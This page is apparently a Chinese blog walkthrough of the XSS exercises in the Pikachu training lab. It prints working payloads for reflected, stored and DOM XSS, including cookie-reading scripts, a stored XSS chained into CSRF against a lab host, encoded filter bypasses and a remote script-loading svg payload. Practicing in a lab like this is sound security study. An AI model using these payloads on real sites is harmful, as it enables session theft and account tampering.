<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>pikachu之XSS | It&#39;s ok</title>
  <meta name="description" content="形成 XSS 漏洞的主要原因是程序对输入和输出没有做合适的处理因此在 XSS 漏洞的防范上，一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤：对输入进行过滤，不允许可能导致 XSS 攻击的字符输入;输出转义：根据输出点的位置对输出到前端的内容进行适当转义;  XSS 漏洞分三类：  反射型 xss 存储型 xss DOM 型 xss  反射型 XSSget通过 get 发送">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu之XSS">
<meta property="og:url" content="https://corsnail.github.io/2024/04/29/pikachu%E4%B9%8BXSS/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="形成 XSS 漏洞的主要原因是程序对输入和输出没有做合适的处理因此在 XSS 漏洞的防范上，一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤：对输入进行过滤，不允许可能导致 XSS 攻击的字符输入;输出转义：根据输出点的位置对输出到前端的内容进行适当转义;  XSS 漏洞分三类：  反射型 xss 存储型 xss DOM 型 xss  反射型 XSSget通过 get 发送">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426102936490.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426103052457.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426103132757.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426103157492.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426104204937.gif">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426104205105.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426105338835.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426105514810.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426105652.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/XSS2.gif">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426110211.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/XSS3.gif">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426141610.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426141740.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426142246.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426142458.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/XSS4.gif">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240426144024.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240429173210884.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240429190156356.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240429191947425.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240429192909770.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240429193045.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240429193212.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240429193613.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240429/Pasted%20image%2020240429203613.png">
<meta property="article:published_time" content="2024-04-29T13:20:33.000Z">
<meta property="article:modified_time" content="2024-04-29T13:34:25.818Z">
<meta property="article:author" content="snail">
<meta property="article:tag" content="pikachu">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://corsnail.github.io/images/article/20240429/IMG-20240426102936490.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://corsnail.github.io/2024/04/29/pikachu%E4%B9%8BXSS/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 6.3.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/corsnail" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">snail</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">项目</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/corsnail" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Re/">Re</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/hexo/">hexo</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/wp/">wp</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/">技术分享</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AE%97%E6%B3%95/">算法</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/" rel="tag">hexo</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/leetcode/" rel="tag">leetcode</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/linux/" rel="tag">linux</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pikachu/" rel="tag">pikachu</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/z3/" rel="tag">z3</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/CTF/" style="font-size: 13.5px;">CTF</a> <a href="/tags/hexo/" style="font-size: 13px;">hexo</a> <a href="/tags/leetcode/" style="font-size: 13px;">leetcode</a> <a href="/tags/linux/" style="font-size: 13px;">linux</a> <a href="/tags/pikachu/" style="font-size: 14px;">pikachu</a> <a href="/tags/z3/" style="font-size: 13px;">z3</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">四月 2024</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">三月 2024</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">十一月 2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/29/pikachu%E4%B9%8BXSS/" class="title">pikachu之XSS</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-29T13:20:33.000Z" itemprop="datePublished">2024-04-29</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/25/pikachu%E4%B9%8BCSRF/" class="title">pikachu之CSRF</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-25T09:24:30.000Z" itemprop="datePublished">2024-04-25</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/25/pikachu%E4%B9%8BRCE/" class="title">pikachu之RCE</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-25T06:49:20.000Z" itemprop="datePublished">2024-04-25</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/wp/">wp</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/24/paluctf/" class="title">paluctf wp</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-24T10:15:24.000Z" itemprop="datePublished">2024-04-24</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/19/pikachu%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/" class="title">pikachu之暴力破解</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-19T07:15:24.000Z" itemprop="datePublished">2024-04-19</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-pikachu之XSS" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      pikachu之XSS
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2024/04/29/pikachu%E4%B9%8BXSS/" class="article-date">
	  <time datetime="2024-04-29T13:20:33.000Z" itemprop="datePublished">2024-04-29</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/web/">web</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/pikachu/" rel="tag">pikachu</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2024/04/29/pikachu%E4%B9%8BXSS/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <blockquote>
<p>形成 XSS 漏洞的主要原因是程序对输入和输出没有做合适的处理<br>因此在 XSS 漏洞的防范上，一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:<br>输入过滤：对输入进行过滤，不允许可能导致 XSS 攻击的字符输入;<br>输出转义：根据输出点的位置对输出到前端的内容进行适当转义;</p>
</blockquote>
<p>XSS 漏洞分三类：</p>
<ol>
<li>反射型 xss</li>
<li>存储型 xss</li>
<li>DOM 型 xss</li>
</ol>
<h1 id="反射型-XSS"><a href="#反射型-XSS" class="headerlink" title="反射型 XSS"></a>反射型 XSS</h1><h2 id="get"><a href="#get" class="headerlink" title="get"></a>get</h2><p><img src="/images/article/20240429/IMG-20240426102936490.png"><br>通过 get 发送请求</p>
<p><img src="/images/article/20240429/IMG-20240426103052457.png"><br>查看前端源码</p>
<p><img src="/images/article/20240429/IMG-20240426103132757.png"><br><img src="/images/article/20240429/IMG-20240426103157492.png"><br>把后面都注释掉了，但是输入框有长度限制</p>
<p>直接在请求里面修改</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">alert (<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/article/20240429/IMG-20240426104204937.gif"><br><img src="/images/article/20240429/IMG-20240426104205105.png"><br>前端代码</p>
<h2 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h2><p>这里有个登录，登录进去，直接可以插入 xss</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/images/article/20240429/IMG-20240426105338835.png"></p>
<p>但是登录了就不要只想着弹个 xss，尝试弹个 cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/images/article/20240429/IMG-20240426105514810.png"><br>成功获取 cookie</p>
<h1 id="存储型-XSS"><a href="#存储型-XSS" class="headerlink" title="存储型 XSS"></a>存储型 XSS</h1><p>常见评论，留言板<br><img src="/images/article/20240429/Pasted%20image%2020240426105652.png"><br>这里就是一个留言板</p>
<p><img src="/images/article/20240429/XSS2.gif"><br>插入 xss 之后，每次访问这个界面就会弹 xss，就好像这段代码被插入进去了一样</p>
<p>试试升级危害<br>我们再次登录 kobe 的 csrf 账号<br><img src="/images/article/20240429/Pasted%20image%2020240426110211.png"></p>
<p>然后我们往留言板插入下面的 xss</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;XSS&amp;CSRF&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script src=&quot;http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=999999&amp;add=%E6%B4%9B%E6%9D%89%E7%9F%B6&amp;email=manbaout&amp;submit=submit&quot;&gt;&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>然后模仿用户 kobe 来留言板位置，此时 xss 执行，kobe 的信息被改成 999999<br><img src="/images/article/20240429/XSS3.gif"></p>
<p>如果这里是修改密码，危害可想而知</p>
<h1 id="DOM-型-xss"><a href="#DOM-型-xss" class="headerlink" title="DOM 型 xss"></a>DOM 型 xss</h1><p>JavaScript HTML DOM<br>通过 HTML DOM，JavaScript 能够访问和改变 HTML 文档的所有元素。</p>
<p>参考<br><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/js/js_htmldom.asp">w3school</a></p>
<h2 id="普通"><a href="#普通" class="headerlink" title="普通"></a>普通</h2><p>当你输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(/xss/)</span><br></pre></td></tr></table></figure>

<p><img src="/images/article/20240429/Pasted%20image%2020240426141610.png"><br>当你点击 <code>what do you see?</code> 的时候就会调用一次 alert (&#x2F;xss&#x2F;)</p>
<p><img src="/images/article/20240429/Pasted%20image%2020240426141740.png"><br>源码中写了一个 domxss () 的方法，点击 <code>click me!</code> 的时候就会调用这个方法</p>
<p>这里方法</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">domxss</span>(<span class="params"></span>)&#123; </span><br><span class="line"><span class="keyword">var</span> str = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;text&quot;</span>).<span class="property">value</span>; <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;dom&quot;</span>).<span class="property">innerHTML</span> = <span class="string">&quot;&lt;a href=&#x27;&quot;</span>+str+<span class="string">&quot;&#x27;&gt;what do you see?&lt;/a&gt;&quot;</span>; </span><br><span class="line">&#125; </span><br><span class="line"><span class="comment">//试试：&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt; </span></span><br><span class="line"><span class="comment">//试试：&#x27; onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;,闭合掉就行</span></span><br></pre></td></tr></table></figure>

<p>调用方法不输入时拼接</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;&quot;</span>&gt;</span>what do you see?<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>输入 1 的时候<br><img src="/images/article/20240429/Pasted%20image%2020240426142246.png"></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;1&quot;</span>&gt;</span>what do you see?<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>当 payload 为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/article/20240429/Pasted%20image%2020240426142458.png"><br>会把后面的内容注释</p>
<p>在方法中是这样的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&lt;a href=&#x27;&quot;+&quot;&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;&quot;+&quot;&#x27;&gt;what do you see?&lt;/a&gt;&quot;</span><br></pre></td></tr></table></figure>

<p>把拼接用的字符去掉就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&lt;a href=&#x27;&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;&#x27;&gt;what do you see?&lt;/a&gt;&quot;</span><br></pre></td></tr></table></figure>

<p>事件 <code>onmouseover</code> 的作用就是当你的鼠标移到元素上面触发如下<br><img src="/images/article/20240429/XSS4.gif"></p>
<p>也可以用其他事件，比如 <code>onerror</code> (发生报错就触发)之类的。</p>
<p>靶场作者还留下了另外的 payload，也可以触发</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="xss-x"><a href="#xss-x" class="headerlink" title="xss-x"></a>xss-x</h2><p>输入个 1<br><img src="/images/article/20240429/Pasted%20image%2020240426144024.png"><br>发现和前面差不多，而且过滤了和没有过滤也没有差别</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br><span class="line">&#x27;&gt;&lt;img src=&quot;#&quot; onerror=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br><span class="line">&#x27; onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>
<h1 id="进阶操作"><a href="#进阶操作" class="headerlink" title="进阶操作"></a>进阶操作</h1><h2 id="盲打"><a href="#盲打" class="headerlink" title="盲打"></a>盲打</h2><p>盲打就是看不到源码<br>蒙着眼睛打就行<br>反射型 xss</p>
<h2 id="过滤"><a href="#过滤" class="headerlink" title="过滤"></a>过滤</h2><p>过滤了一些东西，<br>测试黑名单：</p>
<p>1.<br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>回显：<br><img src="/images/article/20240429/IMG-20240429173210884.png"><br>看起来是过滤了 <code>&lt;script</code> 和 <code>&lt;\script</code><br>2.<br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=javascript:alert(1)&gt;</span><br></pre></td></tr></table></figure>
<p>回显：<br><img src="/images/article/20240429/IMG-20240429190156356.png"><br>过滤了 <code>&lt;iframe&gt;</code> 和 <code>javascript:</code></p>
<p>这个简单，直接编码即可绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&amp;#x6A;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3A;&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&gt;&lt;/iframe&gt;</span><br><span class="line"># 通过对指定部位进行编码可以知道过滤了什么</span><br><span class="line">&lt;iframe src=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;:alert(1)&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>


<p>可以用其他的方式去构造 payload，经典</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;svg/onload=alert(1)//</span><br><span class="line">&lt;svg/onload=s=createElement(&#x27;script&#x27;);body.appendChild(s);s.src=&#x27;js地址&#x27;//</span><br></pre></td></tr></table></figure>

<p>好用的 XSS payload：<br><a target="_blank" rel="noopener" href="https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html">XSS OWASP</a><br><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">XSS bp</a><br><a target="_blank" rel="noopener" href="https://github.com/terjanq/Tiny-XSS-Payloads">Tiny-XSS-payload</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/340080.html">常用标签</a><br><a target="_blank" rel="noopener" href="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec">XSS bypass list</a></p>
<p>参考：<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zha0gongz1/p/12732356.html">绕过XSS过滤姿势总结</a></p>
<h2 id="htmlspecialchars"><a href="#htmlspecialchars" class="headerlink" title="htmlspecialchars"></a>htmlspecialchars</h2><p>特殊的 html 字符？<br><img src="/images/article/20240429/IMG-20240429191947425.png"></p>
<p><code>specialchars()</code> 是一个特殊函数，他会过滤<strong>单引号</strong>，<strong>双引号</strong>，<strong>尖括号</strong>，但是默认是不过滤单引号的，需要调整某个参数才会过滤</p>
<p><img src="/images/article/20240429/IMG-20240429192909770.png"><br>会将写入的内容插入到 a 标签的 href 处</p>
<p><img src="/images/article/20240429/Pasted%20image%2020240429193045.png"><br>直接 <code>javascript:alert(1)</code> 即可弹窗</p>
<h2 id="href-输出"><a href="#href-输出" class="headerlink" title="href 输出"></a>href 输出</h2><p><img src="/images/article/20240429/Pasted%20image%2020240429193212.png"><br>和刚才很像，不过这里是没有 <code>specialchars()</code> 函数</p>
<p>刚才的 payload 即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br><span class="line">q&#x27; onclick=&#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="/images/article/20240429/Pasted%20image%2020240429193613.png"><br>成功弹窗</p>
<h2 id="js-输出"><a href="#js-输出" class="headerlink" title="js 输出"></a>js 输出</h2><p><img src="/images/article/20240429/Pasted%20image%2020240429203613.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&lt;/script&gt;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt; # 先把前面的闭合再插入自己的语句</span><br></pre></td></tr></table></figure>


      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://corsnail.github.io/2024/04/29/pikachu%E4%B9%8BXSS/" title="pikachu之XSS" target="_blank" rel="external">https://corsnail.github.io/2024/04/29/pikachu之XSS/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/corsnail" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/corsnail" target="_blank"><span class="text-dark">snail</span><small class="ml-1x"></small></a></h3>
